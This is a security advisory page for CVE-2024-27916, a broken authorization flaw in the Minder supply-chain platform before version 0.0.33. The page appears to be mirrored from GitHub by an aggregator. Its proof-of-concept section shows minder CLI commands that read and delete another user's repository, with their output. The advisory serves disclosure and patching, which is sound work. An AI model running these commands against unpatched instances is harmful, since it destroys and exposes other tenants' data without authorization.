Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-v627-69v2-xx37

Опубликовано: 05 мар. 2024
Источник: github
Github: Прошло ревью
CVSS3: 7.1

Описание

GetRepositoryByName, DeleteRepositoryByName and GetArtifactByName allow access of arbitrary repositories in Minder by any authenticated user

Summary

A Minder user can use the endpoints listed in the issue title to access any repository in the DB, irrespective of who owns the repo and any permissions that user may have.

Details

https://github.com/stacklok/minder/blob/e88e4b286e4bc04c03b0332a77961f085e1aa77f/database/query/repositories.sql#L22-L23 https://github.com/stacklok/minder/blob/a115c8524fbd582b2b277eaadce024bebbded508/internal/controlplane/handlers_repositories.go#L277-L278

The DB query used here checks by repo owner, repo name and provider name (which is always "github"). These query values are not distinct for the particular user - as long as the user has valid credentials and a provider, they can set the repo owner/name to any value they want and the server will return information on this repo.

DeleteRepositoryByName uses the same query and I have been able to delete another user's repo using this technique.

The GetArtifactByName endpoint also uses this DB query. I have not reproduced the behaviour with this endpoint due to a lack of a suitable test case, but I do not see anything in the implementation of the endpoint to prevent it being exploited.

PoC

Setup:

  1. Fresh provider/project on the production minder instance which is owned by me.
  2. A repo registered by another user (in this case, Ozz)
# show my identity $ minder auth whoami No config file present, using default values. Here are your details: +----------------------------------------------------+----------------------------------------------------+ | KEY | VALUE | +----------------------------------------------------+----------------------------------------------------+ | Subject | c93cc12e-999d-49f4-9ee3-593fdfb39204 | +----------------------------------------------------+----------------------------------------------------+ | Created At | 2024-02-26 15:53:29.228 +0000 | | | UTC | +----------------------------------------------------+----------------------------------------------------+ | Updated At | 2024-02-26 15:53:29.228 +0000 | | | UTC | +----------------------------------------------------+----------------------------------------------------+ | Minder Server | api.stacklok.com:443 | +----------------------------------------------------+----------------------------------------------------+ | Project | dmjb / | | | ca059552-7b8a-4c6e-918d-ca7e6cbd0bab | +----------------------------------------------------+----------------------------------------------------+ # show that I have no repos registered $ minder repo list No config file present, using default values. +----+---------+----------+-------------+-------+------+ | ID | PROJECT | PROVIDER | UPSTREAM ID | OWNER | NAME | +----+---------+----------+-------------+-------+------+ # show details on one of Ozz's repos $ minder repo get -n JAORMX/auditevent No config file present, using default values. { "id": "a7e82080-9b6c-41f3-bc08-8e9442f8b2d2", "context": { "provider": "github", "project": "b513f7f0-26dc-42e6-81a0-577df5489e62" }, "owner": "JAORMX", "name": "auditevent", "repoId": "605597568", "hookUrl": "https://api.github.com/repos/JAORMX/auditevent/hooks/464564107", "deployUrl": "https://api.github.com/repos/JAORMX/auditevent/deployments", "cloneUrl": "https://github.com/JAORMX/auditevent.git", "isFork": true, "createdAt": "2024-03-04T13:27:54.019356Z", "updatedAt": "2024-03-04T13:27:54.019356Z", "defaultBranch": "main" } # delete Ozz's repo $ minder repo delete -n JAORMX/auditevent No config file present, using default values. Successfully deleted repo with name: JAORMX/auditevent # Ozz's repo no longer exists $ minder repo get -n JAORMX/auditevent No config file present, using default values. Message: Error getting repo by name Details: NotFound means some requested entity (e.g., file or directory) was not found.

Impact

Any user and project in a multi-tenant Minder instance.

Ссылки

Пакеты

Наименование

github.com/stacklok/minder

go
Затронутые версииВерсия исправления

< 0.0.33

0.0.33

EPSS

Процентиль: 39%
0.00177
Низкий

7.1 High

CVSS3

CVE ID

CVE-2024-27916

Дефекты

CWE-285

Связанные уязвимости

nvd логотип

CVE-2024-27916

CVSS3: 7.1
nvd
почти 2 года назад

Minder is a software supply chain security platform. Prior to version 0.0.33, a Minder user can use the endpoints `GetRepositoryByName`, `DeleteRepositoryByName`, and `GetArtifactByName` to access any repository in the database, irrespective of who owns the repo and any permissions present. The database query checks by repo owner, repo name and provider name (which is always `github`). These query values are not distinct for the particular user - as long as the user has valid credentials and a provider, they can set the repo owner/name to any value they want and the server will return information on this repo. Version 0.0.33 contains a patch for this issue.

EPSS

Процентиль: 39%
0.00177
Низкий

7.1 High

CVSS3

CVE ID

CVE-2024-27916

Дефекты

CWE-285